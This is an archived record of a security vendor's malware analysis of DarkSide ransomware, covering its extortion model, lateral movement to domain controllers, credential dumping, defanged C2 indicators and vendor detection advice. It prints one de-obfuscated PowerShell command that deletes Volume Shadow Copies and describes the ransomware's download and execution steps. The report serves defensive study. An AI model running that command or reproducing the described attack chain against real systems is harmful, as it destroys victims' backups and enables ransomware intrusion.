{
	"id": "7ff5a67a-7314-4434-8b08-18347fe26c9a",
	"created_at": "2026-04-06T00:10:39.938236Z",
	"updated_at": "2026-04-10T03:21:44.570373Z",
	"deleted_at": null,
	"sha1_hash": "49060b98200c99861c3e9714f20afc6ce4aca1ea",
	"title": "Cybereason vs. DarkSide Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1255430,
	"plain_text": "Cybereason vs. DarkSide Ransomware\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-05 15:46:01 UTC\r\nDarkSide is a relatively new ransomware strain that made its first appearance in August 2020. DarkSide follows the\r\nRaaS (ransomware-as-a-service) model, and, according to Hack Forums, the DarkSide team recently made an\r\nannouncement that DarkSide 2.0 has been released. According to the group, it is equipped with the fastest encryption\r\nspeed on the market, and even includes Windows and Linux versions.\r\nThe team is very active on hack forums and keeps its customers updated with news related to the ransomware. In an\r\neffort to grow and expand their operations, the group has started an affiliates program for potential users.\r\nLike many other ransomware variants, DarkSide follows the double extortion trend, which means the threat actors not\r\nonly encrypt the user’s data, but first exfiltrate the data and threaten to make it public if the ransom demand is not paid.\r\nThis technique effectively renders the strategy of backing up data as a precaution against a ransomware attack moot.\r\nDarkSide is observed being used against targets in English-speaking countries, and appears to avoid targets in countries\r\nassociated with former Soviet Bloc nations. The ransom demand ranges between US$200,000 to $2,000,000, and\r\naccording to their website, the group has published stolen data from more than 40 victims, which is estimated to be just a\r\nfraction of the overall number of victims:\r\nDarkSide Leaks website\r\nUnlike many ransomware variants such as Maze, which was employed to successfully attack suburban Washington\r\nschools, the group behind DarkSide appears to have a code of conduct that prohibits attacks against hospitals, hospices,\r\nschools, universities, non-profit organizations, and government agencies:\r\nhttps://www.cybereason.com/blog/cybereason-vs-darkside-ransomware\r\nPage 1 of 13\n\nOne of the rules of the affiliates program - prohibited sectors to attack\r\nKey details\r\n• Emerging Threat: In a short amount of time, the DarkSide group has established a reputation for being a very\r\n“professional” and “organized” group that has potentially generated millions of dollars in profits from the ransomware. \r\n• High Severity: The Cybereason Nocturnus Team assesses the threat level as HIGH given the destructive potential of\r\nthe attacks.\r\n• Human Operated Attack: Prior to the deployment of the ransomware, the attackers attempt to infiltrate and move\r\nlaterally throughout the organization, carrying out a fully-developed attack operation.\r\n• Aiming Towards the DC: The DarkSide group is targeting domain controllers (DCs), which puts targets and the whole\r\nnetwork environment at great risk.\r\n• Detected and Prevented: The Cybereason Defense Platform fully detects and prevents the DarkSide ransomware.\r\nhttps://www.cybereason.com/blog/cybereason-vs-darkside-ransomware\r\nPage 2 of 13\n\nCybereason Blocks DarkSide Ransomware\r\nThe DarkSide group is a relatively new player in the game of ransomware. Despite being a new group, though, the\r\nDarkSide team has already built itself quite a reputation for making their operations more professional and organized.\r\nThe group has a phone number and even a help desk to facilitate negotiations with victims, and they are making a great\r\neffort at collecting information about their victims - not just technical information about their environment, but more\r\ngeneral information about the company itself, like the organization’s size and estimated revenue.\r\nBy collecting information about the victims, the group is making sure the ransomware is only used against the “right\r\ntargets.” The group claims they only target large, profitable companies in their ransomware attacks, and claim to have\r\nextorted millions of dollars from companies in an effort to \"make the world a better place.\" The group even wrote in a\r\nforum that \"some of the money the companies have paid will go to charity… No matter how bad you think our work is,\r\nwe are pleased to know that we helped change someone's life. Today we sended (sic) the first donations.\"\r\nhttps://www.cybereason.com/blog/cybereason-vs-darkside-ransomware\r\nPage 3 of 13\n\nThe attackers posted tax receipts for their donations\r\nThe Darkside group has reportedly tried to donate around $20,000 in stolen bitcoin to different charities, but the charities\r\nrefused to accept the funds because of the source. \r\nBreaking Down the Attack\r\nDownloading the Ransomware\r\nAfter gaining an initial foothold in the network, the attackers start to collect information about the environment and the\r\ncompany. If it turns out that the potential target is on the attacker’s list of prohibited organizations to attack (ie: hospitals,\r\nhttps://www.cybereason.com/blog/cybereason-vs-darkside-ransomware\r\nPage 4 of 13\n\nhospices, schools, universities, non-profit organizations, or government agencies), they don’t move forward with the\r\nattack.\r\nIf not on the prohibited list, the attackers continue to carry out the operation:\r\n• The attackers begins to collect files, credentials and other sensitive information, and exfilitrate it.\r\n• The attackers use PowerShell to download the DarkSide binary as “update.exe” using the “DownloadFile” command,\r\nabusing Certutil.exe and Bitsadmin.exe in the process:\r\nDownloading the DarkSide ransomware binary using DownloadFile command\r\nDownloading the DarkSide ransomware binary using Certutil.exe\r\nIn addition to downloading the DarkSide binary into the C:\\Windows and temporary directories, the attacker also creates\r\na shared folder on the infected machine and uses PowerShell to download a copy of the malware there.\r\nConquering the Domain Controller\r\nAfter successfully gaining a foothold on one machine in the environment, the attacker begins to move laterally in the\r\nenvironment, with the main goal of conquering the Domain Controller (DC).\r\nOnce the attackers make it to the DC, they start to collect other sensitive information and files, including dumping the\r\nSAM hive that stores targets' passwords:\r\nUsing\r\nreg.exe to steal credentials stored in the SAM hive on the DC\r\nIn addition to collecting data from the DC, the attackers use PowerShell to download the DarkSide binary from the\r\nshared folder created on the previously infected host:\r\nhttps://www.cybereason.com/blog/cybereason-vs-darkside-ransomware\r\nPage 5 of 13\n\nThe PowerShell command\r\nexecuted on the DC\r\nThe attackers also create a shared folder using the company’s name on the DC itself, and copies the DarkSide binary.\r\nLater in the attack, after all data has been exfiltrated, the attackers use bitsadmin.exe to distribute the ransomware binary\r\nfrom the shared folder to other assets in the environment in order to maximize the damage:\r\nDownloading the DarkSide ransomware binary from a remote machine using shared folders\r\nIn order to execute the ransomware on the DC, the attackers create a scheduled task called “Test1” that is configured to\r\nexecute the ransomware:\r\nExecution of the DarkSide ransomware via a scheduled task\r\nhttps://www.cybereason.com/blog/cybereason-vs-darkside-ransomware\r\nPage 6 of 13\n\nThe scheduled task \\Test1, used to run the ransomware on\r\nthe DC\r\nDarkSide Analysis\r\nWhen the DarkSide ransomware first executes on the infected host, it checks the language on the system, using\r\nGetSystemDefaultUILanguage() and GetUserDefaultLangID() functions to avoid systems located in the former Soviet\r\nBloc countries from being encrypted:\r\nhttps://www.cybereason.com/blog/cybereason-vs-darkside-ransomware\r\nPage 7 of 13\n\nDebugging the ransomware - checking if the installed language is Russian (419)\r\nThe malware doesn’t encrypt files on systems with the following languages installed:\r\nRussian - 419 Azerbaijani (Latin) - 42C Uzbek (Latin) - 443 Uzbek (Cyrillic) - 843\r\nUkranian - 422  Georgian - 437 Tatar - 444 Arabic (Syria) - 2801\r\nBelarusian - 423 Kazakh - 43F Romanian (Moldova) - 818   \r\nTajik - 428 Kyrgyz (Cyrillic) - 440 Russian (Moldova) - 819  \r\nArmenian - 42B Turkmen - 442  Azerbaijani (Cyrillic) - 82C  \r\nDarkSide then proceeds to stop the following services related to security and backup solutions:\r\nvss  sql  svc  memtas \r\nmepocs  sophos  veeam  backup \r\nhttps://www.cybereason.com/blog/cybereason-vs-darkside-ransomware\r\nPage 8 of 13\n\nDebugging the ransomware - stopping services, and creates connection to the hardcoded C2\r\nIt then creates a connection to its C2 (command and control) server, and in different samples analyzed, the attackers use\r\nthe following domains and IPs:\r\n198.54.117[.]200\r\n198.54.117[.]198\r\n198.54.117[.]199\r\n198.54.117[.]197\r\ntemisleyes[.]com\r\ncatsdegree[.]com\r\nAfter uninstalling the Volume Shadow Copy Service (VSS), DarkSide then deletes the shadow copies by launching an\r\nobfuscated PowerShell script that uses WMI to delete them:\r\nDebugging the ransomware - creating a PowerShell process\r\nThe PowerShell\r\ncommands as shown in the Cybereason defence platform\r\nhttps://www.cybereason.com/blog/cybereason-vs-darkside-ransomware\r\nPage 9 of 13\n\nThe de-obfuscated PowerShell script:\r\nGet-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}\r\nThe malware then enumerates the running processes and terminates different processes to unlock their files so it can both\r\nsteal related information stored in the files and encrypt them.\r\nDarkSide creates a unique User_ID string for the victim, and adds it to the encrypted files extension as follows:\r\n\u003cFile_name\u003e.{userid}. In addition, the malware also changes the icons for the encrypted files and changes the\r\nbackground of the desktop:\r\nBackground set by DarkSide\r\nAnd, of course, it leaves a ransom note: “README.{userid}.TXT”:\r\nDarkSide ransom note\r\nhttps://www.cybereason.com/blog/cybereason-vs-darkside-ransomware\r\nPage 10 of 13\n\nCybereason Detection and Prevention\r\nThe Cybereason Defense Platform is able to prevent the execution of the DarkSide Ransomware using multi-layer\r\nprotection that detects and blocks malware with threat intelligence, machine learning, and next-gen antivirus (NGAV)\r\ncapabilities. Additionally, when the Anti-Ransomware feature is enabled, behavioral detection techniques in the platform\r\nare able to detect and prevent any attempt to encrypt files and generates a MalopTM for it:\r\nMalop for DarkSide ransomware as shown in the Cybereason Defence Platform\r\nMalop for DarkSide ransomware as shown in the Cybereason Defence Platform\r\nUsing the Anti-Malware feature with the right configurations (listed in the recommendations below), the Cybereason\r\nDefense Platform will also detect and prevent the execution of the ransomware and ensure that it cannot encrypt targeted\r\nfiles. The prevention is based on machine learning, which blocks both known and unknown malware variants:\r\nPrevention alert of DarkSide ransomware as shown in the Cybereason Defence Platform\r\nhttps://www.cybereason.com/blog/cybereason-vs-darkside-ransomware\r\nPage 11 of 13\n\nCybereason user notification for preventing the execution of DarkSide\r\nSecurity Recommendations\r\n• Enable the Anti-Ransomware Feature on Cybereason NGAV: Set Cybereason Anti-Ransomware protection mode to\r\nPrevent - more information for customers can be found here\r\n• Enable Anti-Malware Feature on Cybereason NGAV: Set Cybereason Anti-Malware mode to Prevent and set the\r\ndetection mode to Moderate and above - more information can be found here\r\n• Keep Systems Fully Patched: Make sure your systems are patched in order to mitigate vulnerabilities\r\n• Regularly Backup Files to a Remote Server: Restoring your files from a backup is the fastest way to regain access to\r\nyour data\r\n• Use Security Solutions: Protect your environment using organizational firewalls, proxies, web filtering, and mail\r\nfiltering\r\nMITRE ATT\u0026CK TECHNIQUES\r\nLateral\r\nMovement\r\nExecution Persistence\r\nDefense\r\nEvasion\r\nCredential\r\nAccess\r\nDiscovery\r\nCommand\r\nand\r\nControl\r\nImpact\r\nTaint\r\nShared\r\nContent\r\nCommand\r\nand\r\nScripting\r\nInterpreter:\r\nPowerShell\r\nScheduled\r\nTask/Job\r\nDeobfuscate /\r\nDecode Files\r\nor\r\nInformation\r\nCredentials\r\nfrom\r\nPassword\r\nStores\r\nAccount\r\nDiscovery\r\nCommonly\r\nUsed Port\r\nData\r\nEncrypted\r\nfor\r\nImpact\r\n      Masquerading  \r\nSystem\r\nInformation\r\nDiscovery\r\nRemote\r\nFile Copy\r\nService\r\nStop\r\n       \r\nFile and\r\nDirectory\r\nDiscovery\r\nStandard\r\nApplication\r\nLayer\r\nProtocol\r\n \r\n       \r\nProcess\r\nDiscovery\r\nIngress\r\nTool\r\nTransfer\r\n \r\nhttps://www.cybereason.com/blog/cybereason-vs-darkside-ransomware\r\nPage 12 of 13\n\nLior Rochberger\r\nLior is a senior threat researcher at Cybereason, focusing on threat hunting and malware research. Lior began her career\r\nas a team leader in the security operations center in the Israeli Air Force, where she mostly focused on incident response\r\nand malware analysis.\r\nAbout the Author\r\nCybereason Nocturnus\r\n \r\nThe Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government intelligence,\r\nand enterprise security to uncover emerging threats across the globe. They specialize in analyzing new attack\r\nmethodologies, reverse-engineering malware, and exposing unknown system vulnerabilities. The Cybereason Nocturnus\r\nTeam was the first to release a vaccination for the 2017 NotPetya and Bad Rabbit cyberattacks.\r\nAll Posts by Cybereason Nocturnus\r\nSource: https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware\r\nhttps://www.cybereason.com/blog/cybereason-vs-darkside-ransomware\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware"
	],
	"report_names": [
		"cybereason-vs-darkside-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434239,
	"ts_updated_at": 1775791304,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/49060b98200c99861c3e9714f20afc6ce4aca1ea.pdf",
		"text": "https://archive.orkl.eu/49060b98200c99861c3e9714f20afc6ce4aca1ea.txt",
		"img": "https://archive.orkl.eu/49060b98200c99861c3e9714f20afc6ce4aca1ea.jpg"
	}
}